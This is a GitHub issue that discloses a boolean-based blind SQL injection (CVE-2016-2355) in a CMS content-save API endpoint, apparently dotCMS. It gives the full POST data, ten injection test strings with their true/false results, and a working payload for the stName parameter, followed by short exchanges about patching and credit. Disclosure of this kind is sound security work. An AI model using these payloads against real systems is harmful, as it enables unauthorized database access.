Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL Injection Vulnerability(CVE-2016-2355) #8848

Closed
droidsec-cn opened this issue Apr 8, 2016 · 4 comments

Comments

Projects
None yet
2 participants
@droidsec-cn
Copy link

commented Apr 8, 2016

Attack details
url: http://localhost:8080/api/content/save/1
postdata:address1=e&address2=e&city=e&contactMe=false&email=sample%40email.tst&firstName=e&fund=Growth&ipAddress=127.0.0.1&lastName=e&state=e&stName=RequestProspectus
URL encoded POST input stName was set to -1' OR 3_2_1=6 AND 00053=00053 or 'cFbN0pEu'='

Tests performed:
-1' OR 2+53-53-1=0+0+0+1 or 'cFbN0pEu'=' => TRUE
-1' OR 3+53-53-1=0+0+0+1 or 'cFbN0pEu'=' => FALSE
-1' OR 3_2<(0+5+53-53) or 'cFbN0pEu'=' => FALSE
-1' OR 3_2>(0+5+53-53) or 'cFbN0pEu'=' => FALSE
-1' OR 2+1-1-1=1 AND 00053=00053 or 'cFbN0pEu'=' => TRUE
-1' OR 00053=00053 AND 3+1-1-1=1 or 'cFbN0pEu'=' => FALSE
-1' OR 3_2=5 AND 00053=00053 or 'cFbN0pEu'=' => FALSE
-1' OR 3_2=6 AND 00053=00053 or 'cFbN0pEu'=' => TRUE
-1' OR 3_2_0=6 AND 00053=00053 or 'cFbN0pEu'=' => FALSE
-1' OR 3_2_1=6 AND 00053=00053 or 'cFbN0pEu'=' => TRUE

Original value: RequestProspectus

Parameter: stName (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: address1=e&address2=e&city=e&contactMe=false&email=sample@email.tst&firstName=e&fund=Growth&ipAddress=127.0.0.1&lastName=e&state=e&stName=RequestProspectus' AND 6745=6745 AND 'ajDn'='ajDn

@droidsec-cn

This comment has been minimized.

Copy link
Author

commented Apr 12, 2016

may I ask this vulnerability currently has new progress it?

@wezell

This comment has been minimized.

Copy link
Contributor

commented Apr 12, 2016

This issue in the process of being patched for release.

@droidsec-cn

This comment has been minimized.

Copy link
Author

commented Apr 13, 2016

CERT has assigned CVE-2016-2355 to this issue

@droidsec-cn droidsec-cn changed the title SQL Injection Vulnerability SQL Injection Vulnerability(CVE-2016-2355) Apr 13, 2016

@droidsec-cn

This comment has been minimized.

Copy link
Author

commented Apr 13, 2016

Hello,can you update the Credit in http://dotcms.com/security/SI-35
with the team name: Nicky of Tencent Security Platform Department

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.